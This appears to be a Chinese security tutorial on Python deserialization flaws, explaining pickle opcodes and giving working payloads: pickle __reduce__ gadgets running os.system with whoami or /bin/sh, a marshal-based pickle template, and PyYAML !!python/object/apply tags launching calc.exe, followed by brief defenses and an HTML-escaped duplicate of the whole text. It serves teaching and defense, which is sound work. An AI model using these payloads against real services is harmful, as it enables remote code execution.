python反序列化漏洞
字数 10005 2022-08-28 12:18:50

序列化操作

import pickle
class Demo():
def init(self, name='h3rmesk1t'):
self.name = name
print(pickle.dumps(Demo()))

输出:

b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Demo\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\th3rmesk1t\x94sb.'

输出的一大串字符实际上是一串PVM操作码, 可以在pickle.py中看到关于这些操作码的详解.

PVM

组成部分

PVM由三个部分组成:

  • 指令处理器: 从流中读取opcode和参数, 并对其进行解释处理. 重复这个动作, 直到遇到.这个结束符后停止, 最终留在栈顶的值将被作为反序列化对象返回.
  • 栈区(stack): 由Pythonlist实现, 被用来临时存储数据、参数以及对象, 在不断的进出栈过程中完成对数据流的反序列化操作, 并最终在栈顶生成反序列化的结果.
  • 标签区(memo): 由Pythondict实现, 为PVM的整个生命周期提供存储.

执行流程

首先, PVM会把源代码编译成字节码, 字节码是Python语言特有的一种表现形式, 它不是二进制机器码, 需要进一步编译才能被机器执行. 如果Python进程在主机上有写入权限, 那么它会把程序字节码保存为一个以.pyc为扩展名的文件. 如果没有写入权限, 则Python进程会在内存中生成字节码, 在程序执行结束后被自动丢弃.
一般来说, 在构建程序时最好给Python进程在主机上的写入权限, 这样只要源代码没有改变, 生成的.pyc文件就可以被重复利用, 提高执行效率, 同时隐藏源代码.
然后, Python进程会把编译好的字节码转发到PVM(Python虚拟机)中, PVM会循环迭代执行字节码指令, 直到所有操作被完成.

指令集

当前用于pickling的协议共有6种, 使用的协议版本越高, 读取生成的pickle所需的Python版本就要越新.

  • v0版协议是原始的"人类可读"协议, 并且向后兼容早期版本的Python.
  • v1版协议是较早的二进制格式, 它也与早期版本的Python兼容.
  • v2版协议是在Python 2.3中引入的, 它为存储new-style class提供了更高效的机制, 参阅PEP 307.
  • v3版协议添加于Python 3.0, 它具有对bytes对象的显式支持, 且无法被Python 2.x打开, 这是目前默认使用的协议, 也是在要求与其他Python 3版本兼容时的推荐协议.
  • v4版协议添加于Python 3.4, 它支持存储非常大的对象, 能存储更多种类的对象, 还包括一些针对数据格式的优化, 参阅PEP 3154.
  • v5版协议添加于Python 3.8, 它支持带外数据, 加速带内数据处理.
# Pickle opcodes.  See pickletools.py for extensive docs.  The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.

MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call setstate or dict.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py

Protocol 2

PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.new to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long

_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]

Protocol 3 (Python 3.x)

BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes

Protocol 4

SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame

Protocol 5

BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly

上文谈到了opcode是有多个版本的, 在进行序列化时可以通过protocol=num来选择opcode的版本, 指定的版本必须小于等于5.

import os
import pickle
class Demo():
def init(self, name='h3rmesk1t'):
self.name = name
def reduce(self):
return (os.system, ('whoami',))
demo = Demo()
for i in range(6):
print('[+] pickle v{}: {}'.format(str(i), pickle.dumps(demo, protocol=i)))
[+] pickle v0: b'cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'
[+] pickle v1: b'cposix\nsystem\nq\x00(X\x06\x00\x00\x00whoamiq\x01tq\x02Rq\x03.'
[+] pickle v2: b'\x80\x02cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v3: b'\x80\x03cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v4: b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
[+] pickle v5: b'\x80\x05\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'


基本模式:

c<module>
<callable>
(<args>
tR.

这里用一段简短的字节码来演示利用过程:

cos
system
(S'whoami'
tR.


上文中的字节码其实就是import('os').system(('whoami',)), 下面来分解分析一下:

cos         =>  引入模块 os.
system => 引用 system, 并将其添加到 stack.
(S'whoami' => 把当前 stack 存到 metastack, 清空 stack, 再将 'whoami' 压入 stack.
t => stack 中的值弹出并转为 tuple, 把 metastack 还原到 stack, 再将 tuple 压入 stack.
R => system(
('whoami',)).
. => 结束并返回当前栈顶元素.

需要注意的是, 并不是所有的对象都能使用pickle进行序列化和反序列化, 例如文件对象和网络套接字对象以及代码对象就不可以.

漏洞利用方式

漏洞产生的原因在于其可以将自定义的类进行序列化和反序列化, 反序列化后产生的对象会在结束时触发reduce()函数从而触发恶意代码.

简单来说, reduce()魔术方法类似于PHP中的__wakeup()方法, 在反序列化时会先调用reduce()魔术方法.

  1. 如果返回值是一个字符串, 那么将会去当前作用域中查找字符串值对应名字的对象, 将其序列化之后返回.
  2. 如果返回值是一个元组, 要求是26个参数(Python3.8新加入元组的第六项).
    1. 第一个参数是可调用的对象.
    2. 第二个是该对象所需的参数元组, 如果可调用对象不接受参数则必须提供一个空元组.
    3. 第三个是用于表示对象的状态的可选元素, 将被传给前述的setstate()方法, 如果对象没有此方法, 则这个元素必须是字典类型并会被添加至dict属性中.
    4. 第四个是用于返回连续项的迭代器的可选元素.
    5. 第五个是用于返回连续键值对的迭代器的可选元素.
    6. 第六个是一个带有(obj, state)签名的可调用对象的可选元素

基本 Payload

import os
import pickle
class Demo(object):
def reduce(self):
shell = '/bin/sh'
return (os.system,(shell,))
demo = Demo()
pickle.loads(pickle.dumps(demo))


Marshal 反序列化

由于pickle无法序列化code对象, 因此在python2.6后增加了一个marshal模块来处理code对象的序列化问题.

import base64
import marshal

def demo():
import os
os.system('/bin/sh')

code_serialized = base64.b64encode(marshal.dumps(demo()))
print(code_serialized)

但是marshal不能直接使用reduce, 因为reduce是利用调用某个callable并传递参数来执行的, 而marshal函数本身就是一个callable, 需要执行它, 而不是将他作为某个函数的参数.
这时候就要利用上面分析的那个PVM操作码来进行构造了, 先写出来需要执行的内容, Python能通过types.FunctionTyle(func_code,globals(),'')()来动态地创建匿名函数, 这一部分的内容可以看官方文档的介绍.
结合上文的示例代码, 最重要执行的是: (types.FunctionType(marshal.loads(base64.b64decode(code_enc)), globals(), ''))().
这里直接贴一下别的师傅给出来的Payload模板.

import base64
import pickle
import marshal

def foo():
import os
os.system('whoami;/bin/sh') # evil code

shell = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))

print(pickle.loads(shell))


PyYAML 反序列化

漏洞点

找到yaml/constructor.py文件, 查看文件代码中的三个特殊Python标签的源码:

  • !!python/object标签.
  • !!python/object/new标签.
  • !!python/object/apply标签.


这三个Python标签中都是调用了make_python_instance函数, 跟进查看该函数. 可以看到, 在该函数是会根据参数来动态创建新的Python类对象或通过引用module的类创建对象, 从而可以执行任意命令.

Payload(PyYaml < 5.1)

!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/apply:subprocess.check_output [["calc.exe"]]

Pyload(PyYaml >= 5.1)

from yaml import *
data = b"""!!python/object/apply:subprocess.Popen - calc"""
deserialized_data = load(data, Loader=Loader)
print(deserialized_data)


from yaml import *
data = b"""!!python/object/apply:subprocess.Popen

  • calc"""
    deserialized_data = unsafe_load(data)
    print(deserialized_data)

防御方法

  • 采用用更高级的接口__getnewargs()getstate()setstate()等代替reduce()魔术方法.
  • 进行反序列化操作之前进行严格的过滤, 若采用的是pickle库可采用装饰器实现.

参考链接:https://xz.aliyun.com/t/11082

MARK = b&#x27;(&#x27; # push special markobject on stack STOP = b&#x27;.&#x27; # every pickle ends with STOP POP = b&#x27;0&#x27; # discard topmost stack item POP_ MARK = b&#x27;1&#x27; # discard stack top through topmost markobject DUP = b&#x27;2&#x27; # duplicate top stack item FLOAT = b&#x27;F&#x27; # push float object; decimal string argument INT = b&#x27;I&#x27; # push integer or bool; decimal string argument BININT = b&#x27;J&#x27; # push four-byte signed int BININT1 = b&#x27;K&#x27; # push 1-byte unsigned int LONG = b&#x27;L&#x27; # push long; decimal string argument BININT2 = b&#x27;M&#x27; # push 2-byte unsigned int NONE = b&#x27;N&#x27; # push None PERSID = b&#x27;P&#x27; # push persistent object; id is taken from string arg BINPERSID = b&#x27;Q&#x27; # &quot; &quot; &quot; ; &quot; &quot; &quot; &quot; stack REDUCE = b&#x27;R&#x27; # apply callable to argtuple, both on stack STRING = b&#x27;S&#x27; # push string; NL-terminated string argument BINSTRING = b&#x27;T&#x27; # push string; counted binary string argument SHORT_ BINSTRING= b&#x27;U&#x27; # &quot; &quot; ; &quot; &quot; &quot; &quot; &lt; 256 bytes UNICODE = b&#x27;V&#x27; # push Unicode string; raw-unicode-escaped&#x27;d argument BINUNICODE = b&#x27;X&#x27; # &quot; &quot; &quot; ; counted UTF-8 string argument APPEND = b&#x27;a&#x27; # append stack top to list below it BUILD = b&#x27;b&#x27; # call setstate or dict .update() GLOBAL = b&#x27;c&#x27; # push self.find_ class(modname, name); 2 string args DICT = b&#x27;d&#x27; # build a dict from stack items EMPTY_ DICT = b&#x27;}&#x27; # push empty dict APPENDS = b&#x27;e&#x27; # extend list on stack by topmost stack slice GET = b&#x27;g&#x27; # push item from memo on stack; index is string arg BINGET = b&#x27;h&#x27; # &quot; &quot; &quot; &quot; &quot; &quot; ; &quot; &quot; 1-byte arg INST = b&#x27;i&#x27; # build &amp; push class instance LONG_ BINGET = b&#x27;j&#x27; # push item from memo on stack; index is 4-byte arg LIST = b&#x27;l&#x27; # build list from topmost stack items EMPTY_ LIST = b&#x27; ]&#x27; # push empty list OBJ = b&#x27;o&#x27; # build &amp; push class instance PUT = b&#x27;p&#x27; # store stack top in memo; index is string arg BINPUT = b&#x27;q&#x27; # &quot; &quot; &quot; &quot; &quot; ; &quot; &quot; 1-byte arg LONG_ BINPUT = b&#x27;r&#x27; # &quot; &quot; &quot; &quot; &quot; ; &quot; &quot; 4-byte arg SETITEM = b&#x27;s&#x27; # add key+value pair to dict TUPLE = b&#x27;t&#x27; # build tuple from topmost stack items EMPTY_ TUPLE = b&#x27;)&#x27; # push empty tuple SETITEMS = b&#x27;u&#x27; # modify dict by adding topmost key+value pairs BINFLOAT = b&#x27;G&#x27; # push float; arg is 8-byte float encoding TRUE = b&#x27;I01\n&#x27; # not an opcode; see INT docs in pickletools.py FALSE = b&#x27;I00\n&#x27; # not an opcode; see INT docs in pickletools.py Protocol 2 PROTO = b&#x27;\x80&#x27; # identify pickle protocol NEWOBJ = b&#x27;\x81&#x27; # build object by applying cls. new to argtuple EXT1 = b&#x27;\x82&#x27; # push object from extension registry; 1-byte index EXT2 = b&#x27;\x83&#x27; # ditto, but 2-byte index EXT4 = b&#x27;\x84&#x27; # ditto, but 4-byte index TUPLE1 = b&#x27;\x85&#x27; # build 1-tuple from stack top TUPLE2 = b&#x27;\x86&#x27; # build 2-tuple from two topmost stack items TUPLE3 = b&#x27;\x87&#x27; # build 3-tuple from three topmost stack items NEWTRUE = b&#x27;\x88&#x27; # push True NEWFALSE = b&#x27;\x89&#x27; # push False LONG1 = b&#x27;\x8a&#x27; # push long from &lt; 256 bytes LONG4 = b&#x27;\x8b&#x27; # push really big long _ tuplesize2code = [ EMPTY_ TUPLE, TUPLE1, TUPLE2, TUPLE3 ] Protocol 3 (Python 3.x) BINBYTES = b&#x27;B&#x27; # push bytes; counted binary string argument SHORT_ BINBYTES = b&#x27;C&#x27; # &quot; &quot; ; &quot; &quot; &quot; &quot; &lt; 256 bytes Protocol 4 SHORT_ BINUNICODE = b&#x27;\x8c&#x27; # push short string; UTF-8 length &lt; 256 bytes BINUNICODE8 = b&#x27;\x8d&#x27; # push very long string BINBYTES8 = b&#x27;\x8e&#x27; # push very long bytes string EMPTY_ SET = b&#x27;\x8f&#x27; # push empty set on the stack ADDITEMS = b&#x27;\x90&#x27; # modify set by adding topmost stack items FROZENSET = b&#x27;\x91&#x27; # build frozenset from topmost stack items NEWOBJ_ EX = b&#x27;\x92&#x27; # like NEWOBJ but work with keyword only arguments STACK_ GLOBAL = b&#x27;\x93&#x27; # same as GLOBAL but using names on the stacks MEMOIZE = b&#x27;\x94&#x27; # store top of the stack in memo FRAME = b&#x27;\x95&#x27; # indicate the beginning of a new frame Protocol 5 BYTEARRAY8 = b&#x27;\x96&#x27; # push bytearray NEXT_ BUFFER = b&#x27;\x97&#x27; # push next out-of-band buffer READONLY_ BUFFER = b&#x27;\x98&#x27; # make top of stack readonly 上文谈到了 opcode 是有多个版本的, 在进行序列化时可以通过 protocol=num 来选择 opcode 的版本, 指定的版本必须小于等于 5 . import os import pickle class Demo(): def init (self, name=&#x27;h3rmesk1t&#x27;): self.name = name def reduce (self): return (os.system, (&#x27;whoami&#x27;,)) demo = Demo() for i in range(6): print(&#x27;[ + ] pickle v{}: {}&#x27;.format(str(i), pickle.dumps(demo, protocol=i))) [ + ] pickle v0: b&#x27;cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.&#x27; [ + ] pickle v1: b&#x27;cposix\nsystem\nq\x00(X\x06\x00\x00\x00whoamiq\x01tq\x02Rq\x03.&#x27; [ + ] pickle v2: b&#x27;\x80\x02cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.&#x27; [ + ] pickle v3: b&#x27;\x80\x03cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.&#x27; [ +] pickle v4: b&#x27;\x80\x04\x95 !\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.&#x27; [ +] pickle v5: b&#x27;\x80\x05\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.&#x27; 基本模式: c&lt;module&gt; &lt;callable&gt; (&lt;args&gt; tR. 这里用一段简短的字节码来演示利用过程: cos system (S&#x27;whoami&#x27; tR. 上文中的字节码其实就是 import (&#x27;os&#x27;).system( (&#x27;whoami&#x27;,)) , 下面来分解分析一下: cos =&gt; 引入模块 os. system =&gt; 引用 system, 并将其添加到 stack. (S&#x27;whoami&#x27; =&gt; 把当前 stack 存到 metastack, 清空 stack, 再将 &#x27;whoami&#x27; 压入 stack. t =&gt; stack 中的值弹出并转为 tuple, 把 metastack 还原到 stack, 再将 tuple 压入 stack. R =&gt; system( (&#x27;whoami&#x27;,)). . =&gt; 结束并返回当前栈顶元素. 需要注意的是, 并不是所有的对象都能使用 pickle 进行序列化和反序列化, 例如文件对象和网络套接字对象以及代码对象就不可以. 漏洞利用方式 漏洞产生的原因在于其可以将自定义的类进行序列化和反序列化, 反序列化后产生的对象会在结束时触发 reduce () 函数从而触发恶意代码. 简单来说,  reduce () 魔术方法类似于 PHP 中的 __ wakeup() 方法, 在反序列化时会先调用 reduce () 魔术方法. 如果返回值是一个字符串, 那么将会去当前作用域中查找字符串值对应名字的对象, 将其序列化之后返回. 如果返回值是一个元组, 要求是 2 到 6 个参数( Python3.8 新加入元组的第六项). 第一个参数是可调用的对象. 第二个是该对象所需的参数元组, 如果可调用对象不接受参数则必须提供一个空元组. 第三个是用于表示对象的状态的可选元素, 将被传给前述的 setstate () 方法, 如果对象没有此方法, 则这个元素必须是字典类型并会被添加至 dict 属性中. 第四个是用于返回连续项的迭代器的可选元素. 第五个是用于返回连续键值对的迭代器的可选元素. 第六个是一个带有 (obj, state) 签名的可调用对象的可选元素 基本 Payload import os import pickle class Demo(object): def reduce (self): shell = &#x27;&#x2F;bin&#x2F;sh&#x27; return (os.system,(shell,)) demo = Demo() pickle.loads(pickle.dumps(demo)) Marshal 反序列化 由于 pickle 无法序列化 code 对象, 因此在 python2.6 后增加了一个 marshal 模块来处理 code 对象的序列化问题. import base64 import marshal def demo(): import os os.system(&#x27;&#x2F;bin&#x2F;sh&#x27;) code_ serialized = base64.b64encode(marshal.dumps(demo())) print(code_ serialized) 但是 marshal 不能直接使用 reduce , 因为 reduce 是利用调用某个 callable 并传递参数来执行的, 而 marshal 函数本身就是一个 callable , 需要执行它, 而不是将他作为某个函数的参数. 这时候就要利用上面分析的那个 PVM 操作码来进行构造了, 先写出来需要执行的内容,  Python 能通过 types.FunctionTyle(func_ code,globals(),&#x27;&#x27;)() 来动态地创建匿名函数, 这一部分的内容可以看 官方文档 的介绍. 结合上文的示例代码, 最重要执行的是:  (types.FunctionType(marshal.loads(base64.b64decode(code_ enc)), globals(), &#x27;&#x27;))() . 这里直接贴一下别的师傅给出来的 Payload 模板. import base64 import pickle import marshal def foo(): import os os.system(&#x27;whoami;&#x2F;bin&#x2F;sh&#x27;) # evil code shell = &quot;&quot;&quot;ctypes FunctionType (cmarshal loads (cbase64 b64decode (S&#x27;%s&#x27; tRtRc__ builtin__ globals (tRS&#x27;&#x27; tR(tR.&quot;&quot;&quot; % base64.b64encode(marshal.dumps(foo.func_ code)) print(pickle.loads(shell)) PyYAML 反序列化 漏洞点 找到 yaml&#x2F;constructor.py 文件, 查看文件代码中的三个特殊 Python 标签的源码: !!python&#x2F;object 标签. !!python&#x2F;object&#x2F;new 标签. !!python&#x2F;object&#x2F;apply 标签. 这三个 Python 标签中都是调用了 make_ python_ instance 函数, 跟进查看该函数. 可以看到, 在该函数是会根据参数来动态创建新的 Python 类对象或通过引用 module 的类创建对象, 从而可以执行任意命令. Payload(PyYaml &lt; 5.1) !!python&#x2F;object&#x2F;apply:os.system [ &quot;calc.exe&quot; ] !!python&#x2F;object&#x2F;new:os.system [ &quot;calc.exe&quot; ] !!python&#x2F;object&#x2F;new:subprocess.check_ output [ [ &quot;calc.exe&quot;] ] !!python&#x2F;object&#x2F;apply:subprocess.check_ output [ [ &quot;calc.exe&quot;]] Pyload(PyYaml &gt;= 5.1) from yaml import * data = b&quot;&quot;&quot;! !python&#x2F;object&#x2F;apply:subprocess.Popen - calc&quot;&quot;&quot; deserialized_ data = load(data, Loader=Loader) print(deserialized_ data) from yaml import * data = b&quot;&quot;&quot;! !python&#x2F;object&#x2F;apply:subprocess.Popen calc&quot;&quot;&quot; deserialized_ data = unsafe_ load(data) print(deserialized_ data) 防御方法 采用用更高级的接口 __ getnewargs() 、 getstate () 、 setstate () 等代替 reduce () 魔术方法. 进行反序列化操作之前进行严格的过滤, 若采用的是 pickle 库可采用装饰器实现. 参考链接:https:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;11082